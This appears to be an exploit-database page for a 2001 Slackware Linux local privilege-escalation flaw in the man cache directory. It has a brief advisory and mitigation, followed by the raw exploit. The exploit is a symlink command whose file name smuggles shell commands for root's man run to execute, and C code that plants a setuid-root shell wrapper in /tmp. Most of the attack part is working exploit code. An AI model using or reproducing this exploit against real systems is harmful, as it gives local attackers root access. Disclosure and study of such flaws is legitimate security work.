header-logo
Suggest Exploit
vendor:
Slackware Linux
by:
SecurityFocus
7.2
CVSS
HIGH
Local File Creation Vulnerability
264
CWE
Product Name: Slackware Linux
Affected Version From: Slackware Linux
Affected Version To: Slackware Linux
Patch Exists: NO
Related CWE: N/A
CPE: o:slackware:slackware_linux
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2001

Slackware Linux Local File Creation Vulnerability

Slackware Linux contains a configuration error that enables local users to create files in the directory used by the system manual pager ('man') for cache files. Due to the behaviour of the 'man' program, it may be possible for an attacker to create a malicious cache file causing the execution of arbitrary code when another user views a manual page corresponding to that cache file.

Mitigation:

Restrict access to the /usr/man/man7 directory and ensure that only trusted users have access to the directory.
Source

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/3054/info

Slackware Linux contains a configuration error that enables local users to create files in the directory used by the system manual pager ('man') for cache files.

Due to the behaviour of the 'man' program, it may be possible for an attacker to create a malicious cache file causing the execution of arbitrary code when another user views a manual page corresponding to that cache file. 

ln -s "/usr/man/man7/man.7.gz;cd;cd ..;cd ..;cd ..;cd ..;cd tmp;export PATH=.;script;man.7" /var/man/cat7/man.7.gz

When `/usr/bin/man man` is executed by root, it will create
/var/man/cat7/man.1.gz. The symlink forces it to create a file in /usr/man/man7 named:
"/usr/man/man7/man.7.gz;cd;cd ..;cd ..;cd ..;cd ..;cd tmp;exportPATH=.;script;man.7.gz."

/usr/bin/man will then execute /tmp/script which contains:

#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <errno.h>

int main()
{
FILE *fil;
mode_t perm = 06711;

if(!getuid()) {
fil = fopen("/tmp/bleh.c","w");
fprintf(fil,"%s\n","#include <unistd.h>");
fprintf(fil,"%s\n","#include <stdio.h>");
fprintf(fil,"%s\n","int main() {");
fprintf(fil,"%s\n","setreuid(0,0);setregid(0,0);");
fprintf(fil,"%s\n","execl(\"/bin/su\",\"su\",NULL);");
fprintf(fil,"%s\n","return 0; }");
fclose(fil);
system("/usr/bin/gcc -o /tmp/bleh /tmp/bleh.c");
unlink("/tmp/bleh.c");
chmod("/tmp/bleh", perm);
}
execl("/usr/bin/man","man","/usr/man/man7/man.7.gz",NULL);
return 0;
}